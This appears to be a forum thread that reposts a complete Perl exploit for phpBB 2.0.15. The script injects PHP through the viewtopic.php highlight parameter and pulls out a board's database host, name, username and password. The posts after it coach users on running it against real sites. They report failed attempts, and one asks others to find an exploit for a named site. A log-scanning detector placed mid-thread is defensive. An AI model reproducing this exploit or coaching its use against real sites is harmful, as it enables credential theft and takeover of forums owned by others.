Php2.0.15: An Exploit That Gives the DB, Username and Pass
-
#!/usr/bin/perl
# tested and working /str0ke
# ********************************************************************
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability **
#** This exploit gives the user all the details about the database **
#** connection such as database host, username, password and **
#** database name. **
#** **
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005 **
#** **
#** Greetings to GvR, Jumento, PP, CKrew & friends **
#** **
#*****************************************************************************
# ***************************************************************************use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}# milw0rm.com [2005-07-03]
The exploit was taken from www.milw0rm.com.
perl 15.pl www.siteadi.com /forumyolu/ 8 or 20
If the vulnerability is there:
sending exploit ok
database :
database name :
user name:
password:
The forum site is yours.
This exploit was posted before, but this one is newly updated.
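For defenders, the request this script sends stands out in web-server access logs: a `highlight` parameter on `viewtopic.php` that carries a quote, a PHP variable or a function call instead of a search word. The detector below is an added example, not part of the original thread; the log lines are constructed samples in combined log format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """
192.0.2.10 - - [03/Jul/2005:10:00:01 +0000] "GET /forum/viewtopic.php?t=8&highlight=perl+socket HTTP/1.1" 200 5120
198.51.100.7 - - [03/Jul/2005:10:02:14 +0000] "GET /forum/viewtopic.php?t=8&highlight='.printf(GvRSecureD.$dbhost.GvRSecureD).' HTTP/1.1" 200 6011
198.51.100.7 - - [03/Jul/2005:10:02:15 +0000] "GET /forum/viewtopic.php?t=8&highlight=%27.printf(1).%27 HTTP/1.1" 200 6011
192.0.2.44 - - [03/Jul/2005:10:03:00 +0000] "GET /forum/search.php?q='quoted' HTTP/1.1" 200 900
""".strip().splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A highlight term is a search word: quotes, $variables and call syntax do not belong in it.
SUSPICIOUS_RE = re.compile(r"""['"`]|\$\w+|\w+\(""")

def fully_unquote(value, rounds=3):
    """Percent-decode until stable so layered encoding cannot hide the characters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_highlight(log_line):
    """Return the decoded highlight value if it looks like injected PHP, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("viewtopic.php"):
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get("highlight", []):
        value = fully_unquote(raw)
        if SUSPICIOUS_RE.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_highlight) for every flagged request."""
    return [(line.split()[0], hit) for line in lines
            if (hit := suspicious_highlight(line)) is not None]

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: suspicious highlight parameter: {value}")
```

A hit followed by a 200 response on an unpatched phpBB 2.0.15 board means the database credentials in `config.php` should be treated as disclosed and rotated.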
-
OK, but where are we supposed to type this?
-
How to use an exploit was explained earlier. Look there.
-
You need to install Perl on your computer. After installing Perl, drop to C: or wherever Perl is installed, go to that folder and type "perl 15.pl www.siteadi.com /forumyolu/ 8 or 20" and that's it; its explanation will be there anyway. You'll save the code below as 15.pl, or save it as whatever you like.
-
Guys, I just can't find exploit vulnerabilities on sites. Is there a program that checks whether a site has an exploitable vulnerability? Also, I tried the phpbb 2.0.15 exploit on a few sites; it shows connecting [ok], sending exploit failed. I guess this shows the site isn't vulnerable??
-
When I ran the exploit, this is what came up?
G:\Perl\bin>php2.0.15.pl www.site.com/forum/20
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.secured<AT>gmail<DOT>com |
+-----------------------------------------------------------------------+
Usage:
phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING
SERVER - Server where PhpBB is installed.
DIR - PHPBB directory or / for no directory.
THREADID - Id of an existing thread.
COOKIESTRING - Optional, cookie string of the http request.
Use this when a thread needs authentication for viewing
You can use Firefox in combination with "Live HTTP
Headers" to get this cookiestring.
Example 1 (with cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 "phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A
%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7
D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09"
Example 2 (without cookiestring):
phpbbSecured.pl 192.168.168.123 /PHPBB/ 20
-
DeAdPaN wrote:
When I ran the exploit, this is what came up?
It's telling you that you have 2 options. Now, if we assume the site you're going to attack is www.phpbb.com, you'll do it like this:
exploitininadı.pl www.phpbb.com /phpbb/ 20
Here, "exploitininadı" (the exploit's name) is the name you gave the file; no problem up to this point. The next one is the site's name. /phpbb/ is the folder the site's forum is in; if you reach the site's forum as www.asdcf.com/forum, you'll make that /forum/. The 20 is the topic id; it's important that the topic is a thread.
It says you can also put your cookie at the end if you want. I don't know what difference it makes, but do the same as above and write your cookie value next to it...
NOTE!: There is a space after www.siteadı.com, like www.siteadı.com /forum/ (space)20... Be careful, otherwise it won't work.
-
When I write the IP instead of the site name, it starts doing something, I think.
Thank you, thanks.
-
2.0.10 and 2.0.15 didn't work on my site, unfortunately.
Thank you anyway for your contributions.
I'd be glad if you could take a look at www.ttmetal.com and find an exploit that fits it.
I scanned it a lot but couldn't find one.
-
Well done to whoever compiled the exploit, thanks...